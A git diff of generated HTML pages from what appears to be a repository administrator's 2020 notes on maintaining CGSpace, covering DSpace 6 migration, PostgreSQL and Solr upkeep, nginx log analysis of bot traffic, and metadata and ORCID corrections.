        +$ psql -c 'select * from pg_stat_activity' | wc -l
         30
         
        • Tezira said she cleared her browser cache and then was able to submit again diff --git a/docs/2020-05/index.html b/docs/2020-05/index.html index 6213c4ff5..a8ef8257c 100644 --- a/docs/2020-05/index.html +++ b/docs/2020-05/index.html @@ -34,7 +34,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2 "/> - + @@ -166,7 +166,7 @@ I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2
      -
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "07/May/2020:(01|03|04)" | goaccess --log-format=COMBINED -
      +
      # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "07/May/2020:(01|03|04)" | goaccess --log-format=COMBINED -
       
      • The two main IPs making requests around then are 188.134.31.88 and 212.34.8.188
          @@ -211,9 +211,9 @@ Total number of bot hits purged: 192332
        $ cat 2020-05-11-add-orcids.csv
         dc.contributor.author,cg.creator.id
        -"Lutakome, P.","Pius Lutakome: 0000-0002-0804-2649"
        -"Lutakome, Pius","Pius Lutakome: 0000-0002-0804-2649"
        -$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
        +"Lutakome, P.","Pius Lutakome: 0000-0002-0804-2649"
        +"Lutakome, Pius","Pius Lutakome: 0000-0002-0804-2649"
        +$ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
         
        • Run system updates on CGSpace (linode18) and reboot it
            @@ -265,8 +265,8 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-11-add-orcids.csv -db dspace -u dspa
          $ cat 2020-05-19-add-orcids.csv
           dc.contributor.author,cg.creator.id
          -"Bahta, Sirak T.","Sirak Bahta: 0000-0002-5728-2489"
          -$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
          +"Bahta, Sirak T.","Sirak Bahta: 0000-0002-5728-2489"
          +$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
           
          • An IITA user is having issues submitting to CGSpace and I see there are a rising number of PostgreSQL connections waiting in transaction and in lock:
          @@ -300,9 +300,9 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspa
        $ cat 2020-05-25-add-orcids.csv
         dc.contributor.author,cg.creator.id
        -"Díaz, Manuel F.","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        -"Díaz, Manuel Francisco","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        -$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
        +"Díaz, Manuel F.","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        +"Díaz, Manuel Francisco","Manuel Francisco Diaz Baca: 0000-0001-8996-5092"
        +$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p 'fuuu' -d
         
        • Last week Maria asked again about searching for items by accession or issue date
            @@ -327,7 +327,7 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
        -
        # cat /var/log/nginx/*.log.1 | grep -E "29/May/2020:(02|03|04|05)" | goaccess --log-format=COMBINED -
        +
        # cat /var/log/nginx/*.log.1 | grep -E "29/May/2020:(02|03|04|05)" | goaccess --log-format=COMBINED -
         
        • The top is 172.104.229.92, which is the AReS harvester (still not using a user agent, but it’s tagged as a bot in the nginx mapping)
        • Second is 188.134.31.88, which is a Russian host that we also saw in the last few weeks, using a browser user agent and hitting the XMLUI (but it is tagged as a bot in nginx as well)
        • @@ -361,13 +361,13 @@ $ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspa
          $ sudo su - postgres
           $ dropdb dspacetest
           $ createdb -O dspacetest --encoding=UNICODE dspacetest
          -$ psql dspacetest -c 'alter user dspacetest superuser;'
          +$ psql dspacetest -c 'alter user dspacetest superuser;'
           $ pg_restore -d dspacetest -O --role=dspacetest /tmp/cgspace_2020-05-31.backup
          -$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
          +$ psql dspacetest -c 'alter user dspacetest nosuperuser;'
           # run DSpace 5 version of update-sequences.sql!!!
           $ psql -f /home/dspace/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
          -$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
          -$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
          +$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
          +$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;'
           $ exit
           
          • Now switch to the DSpace 6.x branch and start a build:
          • @@ -391,7 +391,7 @@ $ ant update
          • I had a mistake in my Solr internal URL parameter so DSpace couldn’t find it, but once I fixed that DSpace starts up OK!
          • Once the initial Discovery reindexing was completed (after three hours or so!) I started the Solr statistics UUID migration:
          -
          $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
          +
          $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
           $ dspace solr-upgrade-statistics-6x -i statistics -n 250000
           $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
           $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
          @@ -400,8 +400,8 @@ $ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
           
        • It’s taking about 35 minutes for 1,000,000 records…
        • Some issues towards the end of this core:
        -
        Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
        -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
        +
        Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
        +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
                 at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
                 at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
                 at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
        @@ -425,17 +425,17 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
         
    -
    $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
    -$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
    +
    $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f '(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)'
    +$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
     
    • Now the UUID conversion script says there is nothing left to convert, so I can try to run the Atmire CUA conversion utility:
    -
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
     $ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 1
     
    • The processing is very slow and there are lots of errors like this:
    -
    Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
    +
    Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn't be processed
     com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
             at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
    diff --git a/docs/2020-06/index.html b/docs/2020-06/index.html
    index 596eeea4e..3ae6e37fb 100644
    --- a/docs/2020-06/index.html
    +++ b/docs/2020-06/index.html
    @@ -36,7 +36,7 @@ I sent Atmire the dspace.log from today and told them to log into the server to
     In other news, I checked the statistics API on DSpace 6 and it’s working
     I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
     "/>
    -
    +
     
     
         
    @@ -161,8 +161,8 @@ java.lang.NullPointerException
     
     
     
    -
    $ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
    -$ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<commit />'
    +
    $ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<delete><query>*:*</query></delete>'
    +$ curl http://localhost:8080/solr/oai/update -H "Content-type: text/xml" --data-binary '<commit />'
     $ ~/dspace63/bin/dspace oai import
     OAI 2.0 manager action started
     ...
    @@ -279,7 +279,7 @@ sys     3m13.929s
     
  • In theory we can have different languages for metadata fields but in practice we don’t do that, so we might as well normalize everything to “en_US” (and perhaps I should make a curation task to do this)
  • For now I will do it manually on CGSpace and DSpace Test:
  • -
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
    +
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2;
     UPDATE 2414738
     
    -
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
    +
    dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
     
    • Peter asked if it was possible to find all ILRI items that have “zoonoses” or “zoonotic” in their titles and check if they have the ILRI subject “ZOONOTIC DISEASES” (and add it if not)
        @@ -320,7 +320,7 @@ UPDATE 2414738
      $ dspace metadata-export -i 10568/1 -f /tmp/2020-06-08-ILRI.csv
      -$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv > /tmp/ilri.csv
      +$ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-ILRI.csv > /tmp/ilri.csv
       
      • Moayad asked why he’s getting HTTP 500 errors on CGSpace
          @@ -329,7 +329,7 @@ $ csvcut -c 'id,cg.subject.ilri[en_US],dc.title[en_US]' ~/Downloads/2020-06-08-I
      -
      # journalctl --since=today -u tomcat7  | grep -c 'Internal Server Error'
      +
      # journalctl --since=today -u tomcat7  | grep -c 'Internal Server Error'
       482
       
      • They are all related to the REST API, like:
      • @@ -366,12 +366,12 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
      • Looking back, I see ~800 of these errors since I changed the database configuration last week:
      -
      # journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
      +
      # journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
       795
       
      • And only ~280 in the entire month before that…
      -
      # journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
      +
      # journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c 'javax.ws.rs.WebApplicationException'
       286
       
      • So it seems to be related to the database, perhaps that there are less connections in the pool? @@ -394,7 +394,7 @@ Jun 06 08:19:54 linode18 tomcat7[6286]: at java.lang.reflect.Method.invo
      • Looking at the nginx access logs I see that, other than something that seems like Google Feedburner, all hosts using this user agent are all in Sweden!
      -
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
      +
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36' | grep -v '/feed' | awk '{print $1}' | sort | uniq -c | sort -n
          1624 192.36.136.246
          1627 192.36.241.95
          1629 192.165.45.204
      @@ -480,7 +480,7 @@ Total number of bot hits purged: 29025
       
    -
    172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] "GET /rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=0 HTTP/1.1" 403 260 "-" "-"
    +
    172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] "GET /rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=0 HTTP/1.1" 403 260 "-" "-"
     
    • I created an nginx map based on the host’s IP address that sets a temporary user agent (ua) and then changed the conditional in the REST API location block so that it checks this mapped ua instead of the default one
        @@ -497,11 +497,11 @@ Total number of bot hits purged: 29025
    -
    $ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq > /tmp/cip-collections.txt
    +
    $ curl -s 'https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections' 'https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections' | grep -oE '10568/[0-9]+' | sort | uniq > /tmp/cip-collections.txt
     
    • Then I formatted it into a SQL query and exported a CSV:
    -
    dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
    +
    dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = 'contributor' AND qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN ('10568/100533', '10568/100653', '10568/101955', '10568/106580', '10568/108469', '10568/51671', '10568/53085', '10568/53086', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/53093', '10568/53094', '10568/64874', '10568/69069', '10568/70150', '10568/88229', '10568/89346', '10568/89347', '10568/99301', '10568/99302', '10568/99303', '10568/99304', '10568/99428'))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
     COPY 3917
     

    2020-06-15

    -
    $ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&mailto=a.orth@cgiar.org'
    +
    $ http 'https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&mailto=a.orth@cgiar.org'
     
    • Searching for “Bill and Melinda Gates” we can see the name literal and a list of alt-names literals
        @@ -697,14 +697,14 @@ SUSTAIN AGRICULTURAL INNOVATIONS NATIVE VARIETIES PHYTOPHTHORA INFESTANS -$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d +$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -m 127 -d
    • She also wants to change their SWEET POTATOES term to SWEETPOTATOES, both in the CIP subject list and existing items so I updated those too:
    $ cat /tmp/2020-06-30-fix-cip-subjects.csv 
     cg.subject.cip,correct
     SWEET POTATOES,SWEETPOTATOES
    -$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
    +$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.cip -t correct -m 127 -d
     
    • She also finished doing all the corrections to authors that I had sent her last week, but many of the changes are removing Spanish accents from authors names so I asked if she’s really should she wants to do that
    • I ran the fixes and deletes on CGSpace, but not on DSpace Test yet because those scripts need updating for DSpace 6 UUIDs
    • @@ -712,63 +712,63 @@ $ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u
    $ cat 2020-06-29-fix-sponsors.csv
     dc.description.sponsorship,correct
    -"Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil","Conselho Nacional de Desenvolvimento Científico e Tecnológico"
    -"Claussen Simon Stiftung","Claussen-Simon-Stiftung"
    -"Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium","Fonds pour la Formation à la Recherche dans l’Industrie et dans l’Agriculture"
    -"Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    -"Schlumberger Foundation Faculty for the Future","Schlumberger Foundation"
    -"Wildlife Conservation Society, United States","Wildlife Conservation Society"
    -"Portuguese Foundation for Science and Technology","Portuguese Science and Technology Foundation"
    -"Wageningen University and Research","Wageningen University and Research Centre"
    -"Leverhulme Centre for Integrative Research in Agriculture and Health","Leverhulme Centre for Integrative Research on Agriculture and Health"
    -"Natural Science and Engineering Research Council of Canada","Natural Sciences and Engineering Research Council of Canada"
    -"Biotechnology and Biological Sciences Research Council, United Kingdom","Biotechnology and Biological Sciences Research Council"
    -"Home Grown Ceraels Authority United Kingdom","Home-Grown Cereals Authority"
    -"Fiat Panis Foundation","Foundation fiat panis"
    -"Defence Science and Technology Laboratory, United Kingdom","Defence Science and Technology Laboratory"
    -"African Development Bank","African Development Bank Group"
    -"Ministry of Health, Labour, and Welfare, Japan","Ministry of Health, Labour and Welfare"
    -"World Academy of Sciences","The World Academy of Sciences"
    -"Agricultural Research Council, South Africa","Agricultural Research Council"
    -"Department of Homeland Security, USA","U.S. Department of Homeland Security"
    -"Quadram Institute","Quadram Institute Bioscience"
    -"Google.org","Google"
    -"Department for Environment, Food and Rural Affairs, United Kingdom","Department for Environment, Food and Rural Affairs, UK Government"
    -"National Commission for Science, Technology and Innovation, Kenya","National Commission for Science, Technology and Innovation"
    -"Hainan Province Natural Science Foundation of China","Natural Science Foundation of Hainan Province"
    -"German Society for International Cooperation (GIZ)","GIZ"
    -"German Federal Ministry of Food and Agriculture","Federal Ministry of Food and Agriculture"
    -"State Key Laboratory of Environmental Geochemistry, China","State Key Laboratory of Environmental Geochemistry"
    -"QUT student scholarship","Queensland University of Technology"
    -"Australia Centre for International Agricultural Research","Australian Centre for International Agricultural Research"
    -"Belgian Science Policy","Belgian Federal Science Policy Office"
    -"U.S. Department of Agriculture USDA","U.S. Department of Agriculture"
    -"U.S.. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    -"Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    -"Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil","Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul"
    -"Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil","Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro"
    -"Swedish University of Agricultural Sciences (SLU)","Swedish University of Agricultural Sciences"
    -"U.S. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    -"Swedish International Development Cooperation Agency (Sida)","Sida"
    -"Swedish International Development Agency","Sida"
    -"Federal Ministry for Economic Cooperation and Development, Germany","Federal Ministry for Economic Cooperation and Development"
    -"Natural Environment Research Council, United Kingdom","Natural Environment Research Council"
    -"Economic and Social Research Council, United Kingdom","Economic and Social Research Council"
    -"Medical Research Council, United Kingdom","Medical Research Council"
    -"Federal Ministry for Education and Research, Germany","Federal Ministry for Education, Science, Research and Technology"
    -"UK Government’s Department for International Development","Department for International Development, UK Government"
    -"Department for International Development, United Kingdom","Department for International Development, UK Government"
    -"United Nations Children's Fund","United Nations Children's Emergency Fund"
    -"Swedish Research Council for Environment, Agricultural Science and Spatial Planning","Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning"
    -"Agence Nationale de la Recherche, France","French National Research Agency"
    -"Fondation pour la recherche sur la biodiversité","Foundation for Research on Biodiversity"
    -"Programa Nacional de Innovacion Agraria, Peru","Programa Nacional de Innovación Agraria, Peru"
    -"United States Agency for International Development (USAID)","United States Agency for International Development"
    -"West Africa Agricultural Productivity Programme","West Africa Agricultural Productivity Program"
    -"West African Agricultural Productivity Project","West Africa Agricultural Productivity Program"
    -"Rural Development Administration, Republic of Korea","Rural Development Administration"
    -"UK’s Biotechnology and Biological Sciences Research Council (BBSRC)","Biotechnology and Biological Sciences Research Council"
    -$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
    +"Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil","Conselho Nacional de Desenvolvimento Científico e Tecnológico"
    +"Claussen Simon Stiftung","Claussen-Simon-Stiftung"
    +"Fonds pour la formation á la Recherche dans l'Industrie et dans l'Agriculture, Belgium","Fonds pour la Formation à la Recherche dans l’Industrie et dans l’Agriculture"
    +"Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    +"Schlumberger Foundation Faculty for the Future","Schlumberger Foundation"
    +"Wildlife Conservation Society, United States","Wildlife Conservation Society"
    +"Portuguese Foundation for Science and Technology","Portuguese Science and Technology Foundation"
    +"Wageningen University and Research","Wageningen University and Research Centre"
    +"Leverhulme Centre for Integrative Research in Agriculture and Health","Leverhulme Centre for Integrative Research on Agriculture and Health"
    +"Natural Science and Engineering Research Council of Canada","Natural Sciences and Engineering Research Council of Canada"
    +"Biotechnology and Biological Sciences Research Council, United Kingdom","Biotechnology and Biological Sciences Research Council"
    +"Home Grown Ceraels Authority United Kingdom","Home-Grown Cereals Authority"
    +"Fiat Panis Foundation","Foundation fiat panis"
    +"Defence Science and Technology Laboratory, United Kingdom","Defence Science and Technology Laboratory"
    +"African Development Bank","African Development Bank Group"
    +"Ministry of Health, Labour, and Welfare, Japan","Ministry of Health, Labour and Welfare"
    +"World Academy of Sciences","The World Academy of Sciences"
    +"Agricultural Research Council, South Africa","Agricultural Research Council"
    +"Department of Homeland Security, USA","U.S. Department of Homeland Security"
    +"Quadram Institute","Quadram Institute Bioscience"
    +"Google.org","Google"
    +"Department for Environment, Food and Rural Affairs, United Kingdom","Department for Environment, Food and Rural Affairs, UK Government"
    +"National Commission for Science, Technology and Innovation, Kenya","National Commission for Science, Technology and Innovation"
    +"Hainan Province Natural Science Foundation of China","Natural Science Foundation of Hainan Province"
    +"German Society for International Cooperation (GIZ)","GIZ"
    +"German Federal Ministry of Food and Agriculture","Federal Ministry of Food and Agriculture"
    +"State Key Laboratory of Environmental Geochemistry, China","State Key Laboratory of Environmental Geochemistry"
    +"QUT student scholarship","Queensland University of Technology"
    +"Australia Centre for International Agricultural Research","Australian Centre for International Agricultural Research"
    +"Belgian Science Policy","Belgian Federal Science Policy Office"
    +"U.S. Department of Agriculture USDA","U.S. Department of Agriculture"
    +"U.S.. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    +"Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)","Fundação de Amparo à Pesquisa do Estado de São Paulo"
    +"Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil","Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul"
    +"Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil","Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro"
    +"Swedish University of Agricultural Sciences (SLU)","Swedish University of Agricultural Sciences"
    +"U.S. Department of Agriculture (USDA)","U.S. Department of Agriculture"
    +"Swedish International Development Cooperation Agency (Sida)","Sida"
    +"Swedish International Development Agency","Sida"
    +"Federal Ministry for Economic Cooperation and Development, Germany","Federal Ministry for Economic Cooperation and Development"
    +"Natural Environment Research Council, United Kingdom","Natural Environment Research Council"
    +"Economic and Social Research Council, United Kingdom","Economic and Social Research Council"
    +"Medical Research Council, United Kingdom","Medical Research Council"
    +"Federal Ministry for Education and Research, Germany","Federal Ministry for Education, Science, Research and Technology"
    +"UK Government’s Department for International Development","Department for International Development, UK Government"
    +"Department for International Development, United Kingdom","Department for International Development, UK Government"
    +"United Nations Children's Fund","United Nations Children's Emergency Fund"
    +"Swedish Research Council for Environment, Agricultural Science and Spatial Planning","Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning"
    +"Agence Nationale de la Recherche, France","French National Research Agency"
    +"Fondation pour la recherche sur la biodiversité","Foundation for Research on Biodiversity"
    +"Programa Nacional de Innovacion Agraria, Peru","Programa Nacional de Innovación Agraria, Peru"
    +"United States Agency for International Development (USAID)","United States Agency for International Development"
    +"West Africa Agricultural Productivity Programme","West Africa Agricultural Productivity Program"
    +"West African Agricultural Productivity Project","West Africa Agricultural Productivity Program"
    +"Rural Development Administration, Republic of Korea","Rural Development Administration"
    +"UK’s Biotechnology and Biological Sciences Research Council (BBSRC)","Biotechnology and Biological Sciences Research Council"
    +$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t correct -m 29
     
    • Then I started a full re-index at batch CPU priority:
    @@ -784,9 +784,9 @@ sys 2m56.635s -
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8"
     $ dspace metadata-export -i 10568/1 -f /tmp/ilri.cs
    -$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv > /tmp/ilri-covid19.csv
    +$ csvcut -c 'id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]' /tmp/ilri.csv > /tmp/ilri-covid19.csv
     
    • I see that all items with “COVID19” already have “CORONAVIRUS DISEASE” so I don’t need to do anything
    diff --git a/docs/2020-07/index.html b/docs/2020-07/index.html index 54708553a..83ff4767c 100644 --- a/docs/2020-07/index.html +++ b/docs/2020-07/index.html @@ -38,7 +38,7 @@ I restarted Tomcat and PostgreSQL and the issue was gone Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the 5_x-prod branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter’s request "/> - + @@ -139,7 +139,7 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
  • Also, Linode is alerting that we had high outbound traffic rate early this morning around midnight AND high CPU load later in the morning
  • First looking at the traffic in the morning:
  • -
    # cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E "01/Jul/2020:(00|01|02|03|04)" | goaccess --log-format=COMBINED -
    +
    # cat /var/log/nginx/*.log.1 /var/log/nginx/*.log | grep -E "01/Jul/2020:(00|01|02|03|04)" | goaccess --log-format=COMBINED -
     ...
     9659 33.56%    1  0.08% 340.94 MiB 64.39.99.13
     3317 11.53%    1  0.08% 871.71 MiB 199.47.87.140
    @@ -153,8 +153,8 @@ Since I was restarting Tomcat anyways I decided to redeploy the latest changes f
     
  • I will purge hits from that IP from Solr
  • The 199.47.87.x IPs belong to Turnitin, and apparently they are NOT marked as bots and we have 40,000 hits from them in 2020 statistics alone:
  • -
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Turnitin.*/&rows=0" | grep -oE 'numFound="[0-9]+"'
    -numFound="41694"
    +
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=userAgent:/Turnitin.*/&rows=0" | grep -oE 'numFound="[0-9]+"'
    +numFound="41694"
     
    • They used to be “TurnitinBot”… hhmmmm, seems they use both: https://turnitin.com/robot/crawlerinfo.html
    • I will add Turnitin to the DSpace bot user agent list, but I see they are reqesting robots.txt and only requesting item pages, so that’s impressive! I don’t need to add them to the “bad bot” rate limit list in nginx
    • @@ -164,9 +164,9 @@ numFound="41694"
    • The IPs all belong to HostRoyale:
    -
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
    +
    # cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | wc -l
     81
    -# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
    +# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep '01/Jul/2020' | awk '{print $1}' | grep 185.152.250. | sort | uniq | sort -h
     185.152.250.1
     185.152.250.101
     185.152.250.103
    @@ -269,7 +269,7 @@ numFound="41694"
     
